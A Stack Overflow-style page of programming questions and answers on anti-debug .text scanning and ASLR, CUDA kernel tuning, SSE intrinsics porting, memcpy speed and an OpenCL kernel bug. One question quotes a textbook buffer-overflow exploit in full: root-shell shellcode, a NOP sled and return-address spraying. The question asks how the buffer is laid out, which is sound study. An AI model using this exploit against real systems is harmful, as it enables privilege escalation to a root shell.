Same binary but different assembly instructions at runtime (Windows 7)

For a bit of background, I was playing around with anti-debug techniques. To detect software breakpoints, one can search a code segment at runtime for 0xCC (the INT3 opcode). Code example here -> https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/SoftwareBreakpoints.cpp
Instead of checking only one function, I wanted to scan the whole .text section at runtime and compute a hash of it. After some research I ended up with something like this:
int main(int argc, TCHAR* argv[])
{
    HMODULE imageBase = GetModuleHandle(NULL);
    PIMAGE_DOS_HEADER imageDosHeader = (PIMAGE_DOS_HEADER)imageBase;
    PIMAGE_NT_HEADERS imageHeader = (PIMAGE_NT_HEADERS)((SIZE_T)imageBase + imageDosHeader->e_lfanew);
    SIZE_T base = (SIZE_T)imageBase + (SIZE_T)imageHeader->OptionalHeader.BaseOfCode;
    SIZE_T end = base + (SIZE_T)imageHeader->OptionalHeader.SizeOfCode;
    int i = 0;
    int total = 0;
    while (base < end)
    {
        if (*((unsigned char*)base) != 0)
        {
            printf("ASM HEX: 0x%x \n", *((unsigned char*)base));
            total += *((unsigned char*)base);
        }
        base++;
        i++;
    }
    printf("i=%d\nTotal: %d\n", i, total);
    return 0;
}
The code simply sums every non-zero byte of the section and prints the total (it also prints each byte, but I removed that output here for clarity). There is only one .text/code section.
PS C:\Users\buildman\Source\Repos\Test\Debug> For ($i=1; $i -lt 10; $i++) {.\Test.exe | findstr "Total"}
Total: 124027
Total: 141202
Total: 123952
Total: 141502
Total: 125677
Total: 125677
Total: 122602
Total: 140302
Total: 140302
The question is: why is the total different each time?
From one compilation to another I would understand, but I ran the same binary 10 times in a row and some bytes differ... What are those changed bytes, and why?
I'm running it on Windows 7 (inside a VM), compiled with the v110_XP toolset.
Thank you.
Edit 1: Maybe it's because of ASLR, but isn't ASLR supposed to be random? If the addresses were random, the sum would always be different, yet some of the totals above repeat.

@PeterCordes is right (see the comments). It's because of ASLR: I just tested the code with ASLR off, and the sum is always the same. When the loader relocates the image, it patches the absolute addresses embedded in .text via the relocation table, which changes the bytes being summed.
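For anyone reproducing this, here is a minimal sketch (reusing the header walk from the code above; error handling omitted) that checks whether the running image was linked with /DYNAMICBASE, i.e. whether ASLR can relocate it:

#include <windows.h>
#include <stdio.h>

// Minimal sketch: report whether ASLR (/DYNAMICBASE) is enabled for this image.
// If it is, the byte sum of .text can vary between runs due to relocation.
int main(void)
{
    HMODULE imageBase = GetModuleHandle(NULL);
    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)imageBase;
    PIMAGE_NT_HEADERS ntHeaders =
        (PIMAGE_NT_HEADERS)((SIZE_T)imageBase + dosHeader->e_lfanew);
    if (ntHeaders->OptionalHeader.DllCharacteristics &
        IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
        printf("ASLR (dynamic base) is enabled; expect varying sums\n");
    else
        printf("ASLR is disabled; the sum should be stable\n");
    return 0;
}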

Related

What is the logic behind the For Loop Condition, "for( i = 0; i < 160; i += 4 )" in exploit_notesearch.c in Hacking - The Art of Exploitation Book

I've been focused on this book for several years, trying to get through it slowly but surely by understanding all of the details. However, I've hit a roadblock with a specific line of code in the exploit_notesearch.c program source file. The for loop on line 24 reads, "for(i = 0; i < 160; i += 4)".
The entire program source code block is as follows:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] =
    "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
    "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
    "\xe1\xcd\x80";

int main(int argc, char *argv[]) {
    unsigned int i, *ptr, ret, offset = 270;
    char *command, *buffer;

    command = (char *) malloc(200);
    bzero(command, 200);                 // Zero out the new memory.

    strcpy(command, "./notesearch \'");  // Start command buffer.
    buffer = command + strlen(command);  // Set buffer at the end.

    if (argc > 1)                        // Set offset.
        offset = atoi(argv[1]);

    ret = (unsigned int) &i - offset;    // Set return address.

    for (i = 0; i < 160; i += 4)         // Fill buffer with return address.
        *((unsigned int *) (buffer + i)) = ret;

    memset(buffer, 0x90, 60);            // Build NOP sled.
    memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1);

    strcat(command, "\'");
    system(command);                     // Run exploit.
    free(command);
}
What I'm not understanding about this line of code is the author's specific choice of 160 for the loop bound. Why 160? Can someone please explain the logic to me?
Going through GDB, I figured out that changing the value from 160 to something lower keeps the starting location of the NOP sled in the buffer the same, but fewer bytes are written to memory. With fewer bytes written, the target's return address may or may not be overwritten, since the repeated return address may no longer reach it; this depends on how much the value is lowered, if I understand correctly. Still, the comment states that the loop fills the buffer with the return address, which makes it seem like 160 fills the entire buffer, but I'm just not sure. I do not understand the logic.
I even counted the length of the shellcode (35 bytes) and added it to the length of the initial command (15 bytes, not including the escape character), coming to 50; adding that to 160 gives 210, which makes even less sense to me. (210 would be beyond the allocated heap size of 200.)
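For what it's worth, here is a worked layout derived from the posted code itself (the offsets are my own reading of that code, not the book's explanation); note that the NOP sled and shellcode overwrite parts of the 160 bytes rather than being added on top of them:

/* Layout of the 200-byte 'command' allocation, as built by the code above:

   offset   0..13    "./notesearch '"       14 bytes (strlen(command) == 14)
   offset  14..73    NOP sled (0x90)        60 bytes  \
   offset  74..108   shellcode              35 bytes   > the 160-byte buffer
   offset 109..173   repeated ret address   65 bytes  /
   offset 174        closing quote          1 byte (strcat)
   offset 175        terminating NUL        1 byte

   14 + 160 + 1 + 1 = 176 <= 200, so the 160-byte payload fits in the 200-byte
   heap block with room to spare, and 160 is a multiple of 4, so whole 4-byte
   return addresses tile it exactly (160 / 4 = 40 copies). */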
I guess my main question is what is the relationship between the value 160 as it is used in the loop and the size of the buffer?
Secondly, is there any relationship between the value 160 and the 200 bytes allocated on the heap?
Lastly, why do we require two separate pointer variables used in exploit_notesearch.c? Specifically, a *command variable and *buffer variable? Couldn't we simply use one of them?
Any assistance is greatly appreciated.

Optimize CUDA kernel execution time

I'm a student learning CUDA, and I would like to optimize the execution time of my kernel function. To that end, I wrote a short program computing the difference between two pictures, and compared the execution time of a classic CPU implementation in C against a GPU implementation in CUDA C.
Here you can find the code I'm talking about:
int *imgresult_data = (int *) malloc(width*height*sizeof(int));
int size = width*height;

switch (computing_type)
{
    case GPU:
    {
        HANDLE_ERROR(cudaMalloc((void**)&dev_data1, size*sizeof(unsigned char)));
        HANDLE_ERROR(cudaMalloc((void**)&dev_data2, size*sizeof(unsigned char)));
        HANDLE_ERROR(cudaMalloc((void**)&dev_data_res, size*sizeof(int)));

        HANDLE_ERROR(cudaMemcpy(dev_data1, img1_data, size*sizeof(unsigned char), cudaMemcpyHostToDevice));
        HANDLE_ERROR(cudaMemcpy(dev_data2, img2_data, size*sizeof(unsigned char), cudaMemcpyHostToDevice));
        HANDLE_ERROR(cudaMemcpy(dev_data_res, imgresult_data, size*sizeof(int), cudaMemcpyHostToDevice));

        float time;
        cudaEvent_t start, stop;
        HANDLE_ERROR( cudaEventCreate(&start) );
        HANDLE_ERROR( cudaEventCreate(&stop) );
        HANDLE_ERROR( cudaEventRecord(start, 0) );

        for (int m = 0; m < nb_loops; m++)
        {
            diff<<<height, width>>>(dev_data1, dev_data2, dev_data_res);
        }

        HANDLE_ERROR( cudaEventRecord(stop, 0) );
        HANDLE_ERROR( cudaEventSynchronize(stop) );
        HANDLE_ERROR( cudaEventElapsedTime(&time, start, stop) );
        HANDLE_ERROR(cudaMemcpy(imgresult_data, dev_data_res, size*sizeof(int), cudaMemcpyDeviceToHost));

        printf("Time to generate: %4.4f ms \n", time/nb_loops);
        break;
    }
    case CPU:
    {
        clock_t begin = clock(), duration;

        for (int z = 0; z < nb_loops; z++)
        {
            // Apply the difference between 2 images
            for (int i = 0; i < height; i++)
            {
                tmp = i*imgresult_pitch;
                for (int j = 0; j < width; j++)
                {
                    imgresult_data[j + tmp] = (int) img2_data[j + tmp] - (int) img1_data[j + tmp];
                }
            }
        }

        duration = clock() - begin;
        float msec = duration*1000/CLOCKS_PER_SEC;
        msec = msec/nb_loops;
        printf("Time taken %4.4f milliseconds", msec);
        break;
    }
}
And here is my kernel function:
__global__ void diff(unsigned char *data1, unsigned char *data2, int *data_res)
{
    int row = blockIdx.x;
    int col = threadIdx.x;
    int v = col + row*blockDim.x;

    if (row < MAX_H && col < MAX_W)
    {
        data_res[v] = (int) data2[v] - (int) data1[v];
    }
}
I obtained these execution times for each one:
CPU: 1.3210 ms
GPU: 0.3229 ms
I wonder why the GPU result is not as low as it should be. I am a beginner in CUDA, so please be understanding if there are some classic errors.
EDIT1:
Thank you for your feedback. I tried deleting the 'if' condition from the kernel, but it didn't significantly change my program's execution time.
However, after installing the CUDA profiler, it told me that my threads weren't running concurrently. I don't understand why I get this kind of message, but it seems plausible, because my application is only 5 or 6 times faster on the GPU than on the CPU. This ratio should be greater, because each thread is supposed to process one pixel concurrently with all the others. If you have an idea of what I am doing wrong, it would be helpful...
Here are a few things you could do to improve the performance of your diff kernel:
1. Let each thread do more work
In your kernel, each thread handles just a single element; but having a thread do anything at all already carries a bunch of overhead, at both the block and the thread level, including obtaining the parameters, checking the condition and doing address arithmetic. Now, you could say "Oh, but the reads and writes take much more time than that; this overhead is negligible" - but you would be ignoring the fact that the latency of these reads and writes is hidden by the presence of many other warps which may be scheduled to do their work.
So, let each thread process more than a single element. Say, 4, as each thread can easily read 4 bytes at once into a register. Or even 8 or 16; experiment with it. Of course you'll need to adjust your grid and block parameters accordingly.
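As a minimal sketch (the kernel name, the uchar4 reinterpretation, and the multiple-of-4 size are my assumptions, not from the question), each thread could handle four pixels loaded as a single uchar4:

// Sketch: each thread processes 4 pixels, read as one 4-byte uchar4.
// Assumes the image size is a multiple of 4; launch with
// gridDim.x * blockDim.x >= size / 4.
__global__ void diff4(const uchar4 *data1, const uchar4 *data2,
                      int4 *data_res, int n4)
{
    int v = threadIdx.x + blockIdx.x * blockDim.x;
    if (v < n4)
    {
        uchar4 a = data1[v];
        uchar4 b = data2[v];
        data_res[v] = make_int4(b.x - a.x, b.y - a.y, b.z - a.z, b.w - a.w);
    }
}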
2. "Restrict" your pointers
__restrict__ is not part of standard C++, but it is supported in CUDA. It tells the compiler that accesses through the different pointers passed to the function never overlap. See:
What does the restrict keyword mean in C++?
Realistic usage of the C99 'restrict' keyword?
Using it allows the CUDA compiler to apply additional optimizations, e.g. loading or storing data via the non-coherent cache. Indeed, this happens with your kernel, although I haven't measured the effects.
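Applied to the kernel from the question, this is little more than a signature change; a sketch (using a flattened index and a MAX_H * MAX_W bound, which assumes the grid covers the image exactly row by row):

// Sketch: the same diff kernel with __restrict__-qualified pointers, telling
// the compiler the three buffers never alias (true here: separate allocations).
__global__ void diff(const unsigned char * __restrict__ data1,
                     const unsigned char * __restrict__ data2,
                     int * __restrict__ data_res)
{
    int v = threadIdx.x + blockIdx.x * blockDim.x;
    if (v < MAX_H * MAX_W)
        data_res[v] = (int) data2[v] - (int) data1[v];
}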
3. Consider using a "SIMD" instruction
CUDA offers this intrinsic:
__device__ unsigned int __vsubss4(unsigned int a, unsigned int b)
which subtracts each signed byte of b from the corresponding byte of a (i.e. it computes a - b per byte, with signed saturation). If you can "live" with the saturated byte result, rather than expecting a wider int, that could save you some work - and it goes very well with increasing the number of elements per thread. In fact, it might let you increase it even further to reach the optimum.
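A sketch of what that might look like (assuming the image size is a multiple of 4 and the saturated signed-byte results are acceptable):

// Sketch: treat the images as 32-bit words; each __vsubss4 call performs four
// saturated signed byte subtractions, computing data2 - data1 per byte to
// match the original kernel's subtraction order.
__global__ void diff_simd(const unsigned int *data1, const unsigned int *data2,
                          unsigned int *data_res, int n_words)
{
    int v = threadIdx.x + blockIdx.x * blockDim.x;
    if (v < n_words)
        data_res[v] = __vsubss4(data2[v], data1[v]);
}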
I don't think you are measuring times correctly. Memory copy is a time-consuming step on the GPU that you should take into account when measuring your time.
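For instance, the timed region could be widened to include the transfers; a sketch reusing the HANDLE_ERROR macro and the variable names from the question's code:

// Sketch: time the end-to-end GPU path, transfers included, so the
// comparison against the CPU loop is fair.
HANDLE_ERROR( cudaEventRecord(start, 0) );
HANDLE_ERROR( cudaMemcpy(dev_data1, img1_data, size*sizeof(unsigned char), cudaMemcpyHostToDevice) );
HANDLE_ERROR( cudaMemcpy(dev_data2, img2_data, size*sizeof(unsigned char), cudaMemcpyHostToDevice) );
diff<<<height, width>>>(dev_data1, dev_data2, dev_data_res);
HANDLE_ERROR( cudaMemcpy(imgresult_data, dev_data_res, size*sizeof(int), cudaMemcpyDeviceToHost) );
HANDLE_ERROR( cudaEventRecord(stop, 0) );
HANDLE_ERROR( cudaEventSynchronize(stop) );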
I see some details that you can test:
I suppose you are using MAX_H and MAX_W as constants; you may consider instead placing them in device constant memory with cudaMemcpyToSymbol().
Remember to sync your threads using __syncthreads(), so you don't get issues between each loop iteration.
CUDA works with warps, so block dimensions and threads per block work better as multiples of the warp size (32), but no more than 512 threads per block unless your hardware supports more. Here is an example using 128 threads per block: <<<(cols*rows+127)/128,128>>>.
Remember as well to free your allocated GPU memory (cudaFree) and to destroy the timing events you created (cudaEventDestroy).
In your kernel function you can have a single variable int v = threadIdx.x + blockIdx.x * blockDim.x .
Have you checked, besides the execution time, that your result is correct? I think you should use cudaMallocPitch() and cudaMemcpy2D() when working with 2D arrays, because of padding.
There are probably other issues with the code, but here's what I see. The following lines in __global__ void diff are not optimal:
if (row < MAX_H && col < MAX_W)
{
    data_res[v] = (int) data2[v] - (int) data1[v];
}
Conditional operators inside a kernel result in warp divergence. It means that the if and else parts within a warp are executed in sequence rather than in parallel. Also, as you might have realized, the if evaluates to false only at the borders. To avoid the divergence and the needless computation, split your image in two parts:
The central part, where row < MAX_H && col < MAX_W is always true. Create an additional kernel for this area; the if is unnecessary here (see the sketch below).
Border areas that will use your diff kernel.
Obviously you'll have to modify the code that calls the kernels.
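A minimal sketch of such an interior kernel (the name is mine; the caller must size the grid so that every thread is in bounds):

// Sketch: for the region where the bounds check is known to hold, the
// conditional can be dropped entirely. Launch with
// gridDim.x * blockDim.x == number of pixels in this region.
__global__ void diff_interior(const unsigned char *data1,
                              const unsigned char *data2, int *data_res)
{
    int v = threadIdx.x + blockIdx.x * blockDim.x;
    data_res[v] = (int) data2[v] - (int) data1[v];
}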
And on a separate note:
GPUs have a throughput-oriented architecture, not a latency-oriented one like CPUs. That means a CPU may be faster than CUDA when it comes to processing small amounts of data. Have you tried using larger data sets?
The CUDA profiler is a very handy tool that will tell you where the code is not optimal.

Compiling SSE intrinsics in GCC gives an error

My SSE code works completely fine on the Windows platform, but when I build it on Linux I am facing many issues. One among them is this (what follows is just a sample illustration of my code):
int main(int ref, int ref_two)
{
    __m128i a, b;

    a.m128i_u8[0] = ref;
    b.m128i_u8[0] = ref_two;
    .
    .
    .
    .....
}
Error 1:
error : request for member 'm128i_u8' in something not a structure or union
This thread suggests using the appropriate _mm_set_XXX intrinsics instead, since the member-access method above only works on Microsoft compilers:
SSE intrinsics compiling MSDN code with GCC error?
I tried the method mentioned in that thread and replaced the set instruction in my program, but it seriously affects the performance of my application.
My code is massive and it would need to be changed in 2000 places, so I am looking for a better alternative that doesn't hurt my app's performance.
Recently I found this link from Intel, which says to use the -fms-dialect option to port code from Windows to Linux:
http://software.intel.com/sites/products/documentation/doclib/iss/2013/compiler/cpp-lin/GUID-7A69898B-BDBB-4AA9-9820-E4A590945903.htm
Has anybody tried the above method? Has anybody found the solution to porting large code to Linux?
@Paul, here is my code. I placed a timer to measure the time taken by both methods, and the results were shocking.
Code 1: 115 ms (Microsoft method to access elements directly)
Code 2: 151 ms (using set instruction)
It cost me 36 ms when I used set in my code.
NOTE: that is from replacing a single instruction of mine; imagine the performance hit I'd get replacing it in 2000 places in my program.
That's the reason I am looking for a better alternative than the set instruction.
Code 1:
__m128i array;
unsigned char* temp_src;
unsigned char* temp_dst;

for (i = 0; i < 20; i++)
{
    for (j = 0; j < 1600; j += 16)
    {
        Timerstart(&x);
        array = _mm_loadu_si128((__m128i *)(src));
        array.m128i_u8[0] = 36;
        y += Timerstop(x);
        _mm_store_si128((__m128i *)temp_dst, array);
    }
}
Code2:
__m128i array;
unsigned char* temp_src;
unsigned char* temp_dst;

for (i = 0; i < 20; i++)
{
    for (j = 0; j < 1600; j += 16)
    {
        Timerstart(&x);
        array = _mm_set_epi8(*(src+15),*(src+14),*(src+13),*(src+12),
                             *(src+11),*(src+10),*(src+9), *(src+8),
                             *(src+7), *(src+6), *(src+5), *(src+4),
                             *(src+3), *(src+2), *(src+1), 36 );
        y += Timerstop(x);
        _mm_store_si128((__m128i *)temp_dst, array);
    }
}
You're trying to use a non-portable Microsoft-ism. Just stick to the more portable intrinsics, e.g. _mm_set_epi8:
__m128i a = _mm_set_epi8(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ref);
This will work on all platforms and compilers.
If you're seeing performance issues then it's probably because you're doing something inefficient inside a loop - without seeing the actual code though it's not possible to make any specific suggestions on making the code more efficient.
EDIT
Often there are much more efficient ways of loading a vector with a combination of values such as in your example, e.g.:
#include "smmintrin.h" // SSE4.1
for (...)
{
for (...)
{
__m128i v = _mm_loadu_si128(0, (__m128i *)src); // load vector from src..src+15
v = _mm_insert_epi8(v, 0, 36); // replace element 0 with constant `36`
_mm_storeu_si128((__m128i *)dst, v); // store vector at dst..dst+15
}
}
This translates to just 3 instructions. (Note: if you can't assume SSE4.1 minimum then the _mm_insert_epi8 can be replaced with two bitwise intrinsics - this will still be much more efficient than using _mm_set_epi8).
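A sketch of that SSE2-only fallback (the helper name is mine; since the masks are constants, the compiler will hoist them out of any loop):

#include <emmintrin.h> // SSE2

// Sketch: clear byte 0 with an AND mask, then OR in the constant 36.
static inline __m128i set_byte0_to_36(__m128i v)
{
    const __m128i keep_mask = _mm_set_epi8(-1, -1, -1, -1, -1, -1, -1, -1,
                                           -1, -1, -1, -1, -1, -1, -1, 0);
    const __m128i value     = _mm_set_epi8(0, 0, 0, 0, 0, 0, 0, 0,
                                           0, 0, 0, 0, 0, 0, 0, 36);
    return _mm_or_si128(_mm_and_si128(v, keep_mask), value);
}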

Speed of memcpy() greatly influenced by different ways of malloc()

I wrote a program to test the speed of memcpy(). However, how the memory is allocated greatly influences the speed.
CODE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/time.h>

int main(int argc, char *argv[]){
    unsigned char * pbuff_1;
    unsigned char * pbuff_2;
    unsigned long iters = 1000*1000;
    int type = atoi(argv[1]);
    int buff_size = atoi(argv[2])*1024;

    if(type == 1){
        pbuff_1 = (void *)malloc(2*buff_size);
        pbuff_2 = pbuff_1 + buff_size;
    }else{
        pbuff_1 = (void *)malloc(buff_size);
        pbuff_2 = (void *)malloc(buff_size);
    }

    for(int i = 0; i < iters; ++i){
        memcpy(pbuff_2, pbuff_1, buff_size);
    }

    if(type == 1){
        free(pbuff_1);
    }else{
        free(pbuff_1);
        free(pbuff_2);
    }
    return 0;
}
The OS is linux-2.6.35 and the compiler is GCC-4.4.5 with options "-std=c99 -O3".
Results on my computer(memcpy 4KB, iterate 1 million times):
time ./test.test 1 4
real 0m0.128s
user 0m0.120s
sys 0m0.000s
time ./test.test 0 4
real 0m0.422s
user 0m0.420s
sys 0m0.000s
This question is related with a previous question:
Why does the speed of memcpy() drop dramatically every 4KB?
UPDATE
The reason is related with GCC compiler, and I compiled and run this program with different versions of GCC:
GCC version      4.1.3       4.4.5       4.6.3
Time used (1)    0m0.183s    0m0.128s    0m0.110s
Time used (0)    0m1.788s    0m0.422s    0m0.108s
It seems GCC is getting smarter.
The specific addresses returned by malloc are selected by the implementation and are not always optimal for the code using them. You already know that the speed of moving memory around depends greatly on cache and page effects.
Here, the specific pointers returned by malloc are not known. You could print them out using printf("%p", ptr). What is known, however, is that using just one malloc for the two blocks surely avoids page and cache waste between them; that may already be the reason for the speed difference.
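A minimal sketch of that check (the buffer size is hardcoded here for illustration):

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

/* Sketch: print both addresses and their distance, to see whether the two
   separate allocations land at a cache/page-aliasing offset (e.g. a multiple
   of 4KB apart). */
int main(void){
    size_t buff_size = 4*1024;
    unsigned char *pbuff_1 = malloc(buff_size);
    unsigned char *pbuff_2 = malloc(buff_size);
    printf("pbuff_1=%p pbuff_2=%p distance=%ld\n",
           (void *)pbuff_1, (void *)pbuff_2,
           (long)((intptr_t)pbuff_2 - (intptr_t)pbuff_1));
    free(pbuff_1);
    free(pbuff_2);
    return 0;
}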

OpenCL in Xcode/OSX - Can't assign zero in kernel loop

I'm developing an accelerated component in OpenCL, using Xcode 4.5.1 and Grand Central Dispatch, guided by this tutorial.
The full kernel kept failing on the GPU, giving signal SIGABRT. I couldn't make much progress interpreting the error beyond that.
But I broke out aspects of the kernel to test, and I found something very peculiar involving assigning certain values to positions in an array within a loop.
Test scenario: give each thread a fixed range of array indices to initialize.
kernel void zero(size_t num_buckets, size_t positions_per_bucket, global int* array) {
    size_t bucket_index = get_global_id(0);
    if (bucket_index >= num_buckets) return;
    for (size_t i = 0; i < positions_per_bucket; i++)
        array[bucket_index * positions_per_bucket + i] = 0;
}
The above kernel fails. However, when I assign 1 instead of 0, the kernel succeeds (and my host code prints out the array of 1's). Based on a handful of tests on various integer values, I've only had problems with 0 and -1.
I've tried to outsmart the compiler with 1-1, (int) 0, etc, with no success. Passing zero in as a kernel argument worked though.
The assignment to zero does work outside of the context of a for loop:
array[bucket_index * positions_per_bucket] = 0;
The findings above were confirmed on two machines with different configurations. (OSX 10.7 + GeForce, OSX 10.8 + Radeon.) Furthermore, the kernel had no trouble when running on CL_DEVICE_TYPE_CPU -- it's just on the GPU.
Clearly, something ridiculous is happening, and it must be on my end, because "zero" can't be broken. Hopefully it's something simple. Thank you for your help.
Host code:
#include <stdio.h>
#include <stdlib.h>
#include <OpenCL/OpenCL.h>
#include "zero.cl.h"

int main(int argc, const char* argv[]) {
    dispatch_queue_t queue = gcl_create_dispatch_queue(CL_DEVICE_TYPE_GPU, NULL);

    size_t num_buckets = 64;
    size_t positions_per_bucket = 4;

    cl_int* h_array = malloc(sizeof(cl_int) * num_buckets * positions_per_bucket);
    cl_int* d_array = gcl_malloc(sizeof(cl_int) * num_buckets * positions_per_bucket, NULL, CL_MEM_WRITE_ONLY);

    dispatch_sync(queue, ^{
        cl_ndrange range = { 1, { 0 }, { num_buckets }, { 0 } };
        zero_kernel(&range, num_buckets, positions_per_bucket, d_array);
        gcl_memcpy(h_array, d_array, sizeof(cl_int) * num_buckets * positions_per_bucket);
    });

    for (size_t i = 0; i < num_buckets * positions_per_bucket; i++)
        printf("%d ", h_array[i]);
    printf("\n");
}
Refer to the OpenCL standard, section 6, paragraph 8 "Restrictions", bullet point k (emphasis mine):
6.8 k. Arguments to kernel functions in a program cannot be declared with the built-in scalar types bool, half, size_t, ptrdiff_t, intptr_t, and uintptr_t. [...]
The fact that your compiler even let you build the kernel at all indicates it is somewhat broken.
So you might want to fix that... but if that doesn't fix it, then it looks like a compiler bug, plain and simple (in CLC, that is, the OpenCL compiler, not in your host code); there is no reason a kernel like this should work with every constant except 0 and -1. Did you try updating your OpenCL driver? What about trying a different operating system (though I suppose this code is OS X only)?
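A sketch of the kernel with the illegal size_t parameters replaced by uint (the host side would then pass cl_uint values):

// Sketch: uint is a legal kernel argument type; size_t remains fine for
// locals such as the global ID.
kernel void zero(uint num_buckets, uint positions_per_bucket, global int* array) {
    size_t bucket_index = get_global_id(0);
    if (bucket_index >= num_buckets) return;
    for (uint i = 0; i < positions_per_bucket; i++)
        array[bucket_index * positions_per_bucket + i] = 0;
}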
